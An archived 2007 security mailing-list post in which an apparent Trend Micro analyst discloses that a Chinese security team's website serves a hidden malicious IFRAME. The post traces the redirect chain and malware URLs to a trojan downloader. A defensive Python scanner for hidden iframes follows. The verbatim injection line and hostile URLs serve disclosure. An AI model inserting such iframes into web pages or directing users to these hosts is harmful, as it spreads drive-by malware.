funsec mailing list archives

RE: Chinese Internet Security Response Team Website Hosting Malicious Content


From: <Ivan_Macalintal () trendmicro com>
Date: Tue, 2 Oct 2007 13:45:19 -0700


Yep... CISRT is still VERY MUCH hosting malicious content. 
More info on the Trend Malware Blog...

I've checked three pages:

http:// www. cisrt.org/enblog/read.php?172 
(This is the same link being shown in tech news sites like TheRegister -
these guys should be advised to remove this link from their write-ups.)
http:// www. cisrt.org/enblog/
http:// www. cisrt.org/

They still have this IFRAME on the top of the page:

<iframe src=http://mms.nmmmn.com/99916.htm width=0 height=0
frameborder=0></iframe> 

http:// mms.nmmmn.com/99916.htm loads oo.js and ax.htm which is full of
more obfuscated scripts and at least one IFRAME to http://
5x.3x7x.cn/t.htm

The file t.htm has another IFRAME to http:// 60.191.247.178/aaa1.htm
which in turn has these IFRAME links:

http:// 60.191.247.178/Webxl.htm
http:// 60.191.247.178/wm/wm2.htm
http:// 60.191.247.178/wm/vip.htm
http:// 60.191.247.178/wm/wm4.htm
http:// 60.191.247.178/wm/wm5.htm

And a script at:

http:// js.users.51.la/1023960.js

Where a couple of obfuscated JS'es are also downloaded and executed
from:

http:// 60.191.247.178/wm/nick.js
http:// 60.191.247.178/wm/nick2.js

They ultimately download and install http:// mms.nmmmn.com/sms.exe which
is a trojan downloader downloading around 20 more binaries...

Regards,

Ivan Macalintal
Senior Threat Analyst
Trend Micro Inc.
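A defender-side check for the kind of injection described above, added here as an example (it is not code from the post or from Trend Micro): it scans a saved copy of a page for iframes that are sized to zero or hidden by CSS and whose src points off the page's own host. The sample HTML is constructed around the IFRAME quoted in the post; the widget path and the hostname ads.example.net are placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class HiddenIframeScanner(HTMLParser):
    """Collects <iframe> tags that are zero-sized or CSS-hidden,
    noting whether their src points to a host other than the page's."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        # Normalise attribute names/values; unquoted values such as
        # width=0 and src=http://... are handled by html.parser.
        a = {k.lower(): (v or "").strip().lower() for k, v in attrs}
        reasons = []
        if a.get("width") in ("0", "0px") or a.get("height") in ("0", "0px"):
            reasons.append("zero-size")
        style = a.get("style", "").replace(" ", "")
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("css-hidden")
        host = urlparse(a.get("src", "")).hostname or ""
        off_site = bool(host) and host != self.page_host \
            and not host.endswith("." + self.page_host)
        if off_site:
            reasons.append("off-site:" + host)
        # Only hidden frames are reported; a visible off-site iframe is normal.
        if "zero-size" in reasons or "css-hidden" in reasons:
            self.findings.append({"src": a.get("src", ""), "reasons": reasons})


def scan_html(html, page_host):
    """Return a list of suspicious iframe findings for a page served from page_host."""
    scanner = HiddenIframeScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: the IFRAME quoted in the post, a benign same-site
# frame, and a CSS-hidden frame to a placeholder third-party host.
SAMPLE_HTML = """<html><body>
<iframe src=http://mms.nmmmn.com/99916.htm width=0 height=0
frameborder=0></iframe>
<p>Welcome to the blog</p>
<iframe src="/enblog/widget.htm" width="300" height="200"></iframe>
<iframe src="//ads.example.net/ad.htm" style="display: none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML, "www.cisrt.org"):
        print(f["src"], ", ".join(f["reasons"]))
```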




_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.

